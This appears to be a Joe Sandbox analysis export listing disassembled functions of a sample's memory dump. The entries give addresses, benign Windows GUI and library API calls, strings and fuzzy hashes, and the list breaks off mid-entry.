Opcode ID: 1926f1377abb663341dab73130d676f38a13f0a41a1c32b493f567340280ce9c
Instruction ID: 21f2b922383a0fd422ed3da9be19d724b5084e606510e78c5381c08e838ca50c
Opcode Fuzzy Hash: 1926f1377abb663341dab73130d676f38a13f0a41a1c32b493f567340280ce9c
Instruction Fuzzy Hash: 2B217F7194125AAFDB10DFA5CC09BFFBBB8EF19312F10411AE511E2250CB3C9A85CBA5

Function 0054352C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,00000000), ref: 00543552

Part of subcall function 004E0E38: DeleteObject.GDI32 ref: 004E0E51

SelectObject.GDI32(?,00000000), ref: 00543568
DeleteObject.GDI32(00000000), ref: 005435D3
DeleteDC.GDI32(00000000), ref: 005435E2
LeaveCriticalSection.KERNEL32(00646BF4), ref: 005435FB

Strings

DR`, xrefs: 00543535

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Delete$Select$CriticalLeaveSection
String ID: DR`
API String ID: 3849354926-1307419264
Opcode ID: 6205af05e46f98150bf212836e28db27f51d65b4079176f63e5155422cf59c30
Instruction ID: 6cdad22009b28a054dedf2b63d4fe814b76bcadc5a2896f89e6e5078544b55dd
Opcode Fuzzy Hash: 6205af05e46f98150bf212836e28db27f51d65b4079176f63e5155422cf59c30
Instruction Fuzzy Hash: 1C219871900204AFCF01EF6ACC849AA7FA6FF85315B0041AAF818DB166CB71C995DF80

Function 005555BC Relevance: 10.6, APIs: 7, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000037), ref: 005555D9
GetSystemMetrics.USER32(00000032), ref: 005555DF
GetSystemMetrics.USER32(00000037), ref: 005555EB
GetSystemMetrics.USER32(00000036), ref: 005555F1
GetSystemMetrics.USER32(00000031), ref: 005555F7
GetSystemMetrics.USER32(00000036), ref: 00555603
DrawIconEx.USER32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 0055563A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$DrawIcon
String ID:
API String ID: 2707151559-0
Opcode ID: 55e88d8b371a73b044ccd5ce1f7a7a3b4541cc15b29952ca36d38e0febc69379
Instruction ID: 72a3aefca654f0b652eed7935f6e52cbbc90e256f58b3199f51bad112e48056a
Opcode Fuzzy Hash: 55e88d8b371a73b044ccd5ce1f7a7a3b4541cc15b29952ca36d38e0febc69379
Instruction Fuzzy Hash: 46110C31740614B7D7119B748C59F5A7EADEF847A1F288427B608DB1C0E5B2DE06CBD0

Function 005C85F5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C8617
_wcslen.LIBCMT ref: 005C861D
GetDC.USER32(00000000), ref: 005C864C
EnumFontFamiliesExW.GDI32(00000000,?,005C85B3,?,00000000,?,?,?,?,?,?,000003EE,?), ref: 005C8667
ReleaseDC.USER32(00000000,00000000), ref: 005C866F

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Strings

MS UI Gothic, xrefs: 005C861C, 005C862F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EnumException@8FamiliesFontH_prolog3ReleaseThrow_memset_wcslen
String ID: MS UI Gothic
API String ID: 2708522728-1905310704
Opcode ID: caee90a5613a4e46dbbe6e397f31e8f25a8c0d169e504f4072980667520f3f94
Instruction ID: a0b35c9f3c4e8fe0cc7131493c573a496c448f1234c94db5b3087a7e2bfb81b7
Opcode Fuzzy Hash: caee90a5613a4e46dbbe6e397f31e8f25a8c0d169e504f4072980667520f3f94
Instruction Fuzzy Hash: 82018E72901318AFCB10EBE59C4DEBF7ABDEB95B14F14001EF805E7201EE64AA45C6A5

Function 0054E204 Relevance: 10.6, APIs: 7, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0054E20B
~_Task_impl.LIBCPMT ref: 0054E288
~_Task_impl.LIBCPMT ref: 0054E2A6
~_Task_impl.LIBCPMT ref: 0054E2B5
~_Task_impl.LIBCPMT ref: 0054E2C4
~_Task_impl.LIBCPMT ref: 0054E2D3
~_Task_impl.LIBCPMT ref: 0054E2E2

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Task_impl$H_prolog3
String ID:
API String ID: 1204490572-0
Opcode ID: 37b050ee82bedd0d8e663964db6441eb4e5d172ab6f1cf162af8e2dafed092cc
Instruction ID: 07e389b372c89094363b459bc32f463b1d358b3b70830b76aacc97e700716bb7
Opcode Fuzzy Hash: 37b050ee82bedd0d8e663964db6441eb4e5d172ab6f1cf162af8e2dafed092cc
Instruction Fuzzy Hash: 03217C74405782CED714EBB4C15A7EEBFA1BF90308F50499DE5AB13282CFB42A08C766

Function 00509403 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetCapture.USER32(?), ref: 0050941B
GetCursorPos.USER32(?), ref: 0050945A
LoadCursorW.USER32(00000000,00007F86), ref: 00509484
SetCursor.USER32(00000000), ref: 0050948B
GetCursorPos.USER32(?), ref: 00509498

Strings

c, xrefs: 005094A6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Cursor$CaptureLoad
String ID: c
API String ID: 1460996051-2927717585
Opcode ID: 8e05a42018fbe4e3401effd640128ebc637fc92c8e2e29f7e6353e0aff243b65
Instruction ID: e7cd695c52d6298642d230a66948d3354d65526613a98839869764a69aac4596
Opcode Fuzzy Hash: 8e05a42018fbe4e3401effd640128ebc637fc92c8e2e29f7e6353e0aff243b65
Instruction Fuzzy Hash: FA1182316006159FDB246B75C808BAA7BE9BF99704F00082DF59AC3292CF75A841C751

Function 004E8336 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004E833D
GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 004E839A
GetProcAddress.KERNEL32(UnregisterTouchWindow), ref: 004E83BC

Part of subcall function 004D94E4: ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504

Strings

UnregisterTouchWindow, xrefs: 004E83B1
RegisterTouchWindow, xrefs: 004E8394
user32.dll, xrefs: 004E835C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressProc$ActivateH_prolog3
String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
API String ID: 1001276555-2470269259
Opcode ID: be21c2b777dab80b1d60571efea9688812de96065180d1e20b05c537febff952
Instruction ID: 9ec46ebf7bdc1a872e1589784fcafca77bfe361bf32e50b6b897560c3093b2ad
Opcode Fuzzy Hash: be21c2b777dab80b1d60571efea9688812de96065180d1e20b05c537febff952
Instruction Fuzzy Hash: B111D374600B81EFEB159B26ED0671A3FA1BB01B19F40101EE94EC32A3CB799918CB49

Function 004D9260 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 004D9272
GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 004D928F
GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 004D9299

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Strings

ApplicationRecoveryFinished, xrefs: 004D9291
ApplicationRecoveryInProgress, xrefs: 004D9289
KERNEL32.DLL, xrefs: 004D926A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ApplicationRecoveryFinished$ApplicationRecoveryInProgress$KERNEL32.DLL
API String ID: 417325364-4287352451
Opcode ID: 95c174d43f4f3ee51fe050fe6bc87c8ce7ad7f9bbf67e5e5a7a3d5154ecc8be0
Instruction ID: d6344a7d50b2bdf339e600f27270fb42a8cac29cc698b1e358d63125cba74588
Opcode Fuzzy Hash: 95c174d43f4f3ee51fe050fe6bc87c8ce7ad7f9bbf67e5e5a7a3d5154ecc8be0
Instruction Fuzzy Hash: 3201B536A00219BBDB109BB5C858BBF7AACEF95724F1504ABE501D3340EE78DD00C6E4

Function 004D91F4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 004D9201
GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 004D921E
GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 004D9228

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Strings

RegisterApplicationRestart, xrefs: 004D9218
KERNEL32.DLL, xrefs: 004D91FC
RegisterApplicationRecoveryCallback, xrefs: 004D9220

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: KERNEL32.DLL$RegisterApplicationRecoveryCallback$RegisterApplicationRestart
API String ID: 417325364-723216104
Opcode ID: 0257add5bdff0d557de0cec01c3c66a9c31673c8eced221f7e15ecb48c057639
Instruction ID: fcb070ab3a5b6a60dadf7cb487fb8c8a82da0c22a702bae607ea869d953164dd
Opcode Fuzzy Hash: 0257add5bdff0d557de0cec01c3c66a9c31673c8eced221f7e15ecb48c057639
Instruction Fuzzy Hash: 67F0443254071A774FA11EA59C1896B3E6DEFD47A47040467FE04D2310DE79CC21EA95

Function 004E51B7 Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 004E51C5
GetSysColor.USER32(00000010), ref: 004E51CC
GetSysColor.USER32(00000014), ref: 004E51D3
GetSysColor.USER32(00000012), ref: 004E51DA
GetSysColor.USER32(00000006), ref: 004E51E1
GetSysColorBrush.USER32(0000000F), ref: 004E51EE
GetSysColorBrush.USER32(00000006), ref: 004E51F5

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 07b74aec56ab778d883f5e151053a67af3ffef57b59255917baa6269d2004b8c
Instruction ID: 6eb716e637c610cba93e9d69d87ea17b2d77bef89959d1d940164d00c701fe50
Opcode Fuzzy Hash: 07b74aec56ab778d883f5e151053a67af3ffef57b59255917baa6269d2004b8c
Instruction Fuzzy Hash: 78F0FE719407445BD730BB725D09B57BAD1FFD4710F060D2ED2458B990DAB5E441DF40

Function 00552EF1 Relevance: 9.5, APIs: 6, Instructions: 481COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00552F2C

Part of subcall function 00551251: SetRectEmpty.USER32(?), ref: 0055125E
Part of subcall function 00551251: GetWindowRect.USER32(?,?), ref: 0055126F

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

GetWindowRect.USER32(?,?), ref: 00553172
IntersectRect.USER32(?,?,?), ref: 00553183
IntersectRect.USER32(?,?,?), ref: 005531C0
GetWindowRect.USER32(?,?), ref: 0055338F
EqualRect.USER32(?,?), ref: 005533A8

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$EmptyIntersect$EqualException@8H_prolog3Throw
String ID:
API String ID: 3941049809-0
Opcode ID: 169d21194b372c327e357bde7ae34b67508d5af3352e6b4f1cdc24f25fcd09e3
Instruction ID: f9183859db7d2a7e26b3d29a3d21307e94109eea2d62957a9ff36fda1b7bf2bb
Opcode Fuzzy Hash: 169d21194b372c327e357bde7ae34b67508d5af3352e6b4f1cdc24f25fcd09e3
Instruction Fuzzy Hash: 5F122972D00659DFDF21CFA4C898AAEBFB5BF48341F15446AE809A7211D731AE49CF90

Function 0050EC57 Relevance: 9.2, APIs: 6, Instructions: 221COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0050EC89

Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23

GetWindowRect.USER32(?,?), ref: 0050ED84
GetParent.USER32(?), ref: 0050ED91
GetParent.USER32(?), ref: 0050EDAB
OffsetRect.USER32(?,?,?), ref: 0050EE78
OffsetRect.USER32(?,?,?), ref: 0050EE84

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$OffsetParent$Long
String ID:
API String ID: 2171155602-0
Opcode ID: 3d3dc0faf8145b5ba1438345c77b858d1ac81a5ef80e5fb2b11931c53d397ea7
Instruction ID: 90dca300ff3582659f3501f45e831363a1d3c7e930b5586c73d47c26b2801fe2
Opcode Fuzzy Hash: 3d3dc0faf8145b5ba1438345c77b858d1ac81a5ef80e5fb2b11931c53d397ea7
Instruction Fuzzy Hash: 5291E375D00209EFCF15DFA8C989AEEBBB5FF48300F24496AE905A7251DB356A41CF60

Function 0053F272 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0053F279
GlobalLock.KERNEL32(?), ref: 0053F35F
CreateDialogIndirectParamW.USER32(00000000,?,458DFFFB,0053EC59,00000000), ref: 0053F38E
DestroyWindow.USER32(00000000), ref: 0053F408
GlobalUnlock.KERNEL32(?), ref: 0053F418
GlobalFree.KERNEL32(?), ref: 0053F421

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 0a1eaffd4d4c36ba7480227ff7093803f9bac748efd7598384ff8618f446b61e
Instruction ID: 5ebd76345784a651a2efc4f485f84600a1d72290fb25731527eb427bb727c144
Opcode Fuzzy Hash: 0a1eaffd4d4c36ba7480227ff7093803f9bac748efd7598384ff8618f446b61e
Instruction Fuzzy Hash: 7C514C3190024AEFCF14AFA5C8899BEBFB5BF54314F14093EF542A72A1CB349A45DB61

Function 0053D73B Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0053D764
GetWindowRect.USER32 ref: 0053D7A6
GetWindowRect.USER32(?,?), ref: 0053D7D7
OffsetRect.USER32(?,?,?), ref: 0053D846
OffsetRect.USER32(?,?,?), ref: 0053D852
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0053D8A7

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: RectWindow$Offset
String ID:
API String ID: 1579746580-0
Opcode ID: 89af1b5594a1de260b3f7f37c89245512684b3ca07939d7e2c55d1fdc519b3f3
Instruction ID: 319bc68aa51f14c9bb549f76303296bfd6536dfbe789624163c656a636cf4356
Opcode Fuzzy Hash: 89af1b5594a1de260b3f7f37c89245512684b3ca07939d7e2c55d1fdc519b3f3
Instruction Fuzzy Hash: 3E51E971A00219AFCF01DFA4C988DEEBBB9FF48304F10406AF905F7251DA35AA04DB61

Function 005587C4 Relevance: 9.1, APIs: 6, Instructions: 120windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00558886
GetCursorPos.USER32(00000000), ref: 005588A6
ScreenToClient.USER32(00000000,00000000), ref: 005588B3
PtInRect.USER32(?,00000000,00000000), ref: 005588C6
SendMessageW.USER32(?,00000000,00646E1C), ref: 005588FC
SendMessageW.USER32(00000000,00000000,00646E1C), ref: 00558915

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$ClientCursorParentRectScreen
String ID:
API String ID: 4164469669-0
Opcode ID: 924edf150a45e1eae522a212a1fa2833ac76d739d357cd952234c60a186840da
Instruction ID: 9ff11ba41ccbbd27d1fd2351ab57e9c3282a70c8b3f6c8664af43880e02e49c6
Opcode Fuzzy Hash: 924edf150a45e1eae522a212a1fa2833ac76d739d357cd952234c60a186840da
Instruction Fuzzy Hash: C841B075A00205ABCB10AFA6D854BBA7FFAFB49305F14446EF805E7260DF759808DB25

Function 00540397 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

IsMenu.USER32(?), ref: 005403C8
GetMenuDefaultItem.USER32(?,00000000,00000001), ref: 005403EE
GetMenuItemCount.USER32(?), ref: 005403FA
GetMenuItemID.USER32(?,?), ref: 00540423
GetSubMenu.USER32(?,?), ref: 0054046E
GetMenuState.USER32(?,?,00000400), ref: 005404A8

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
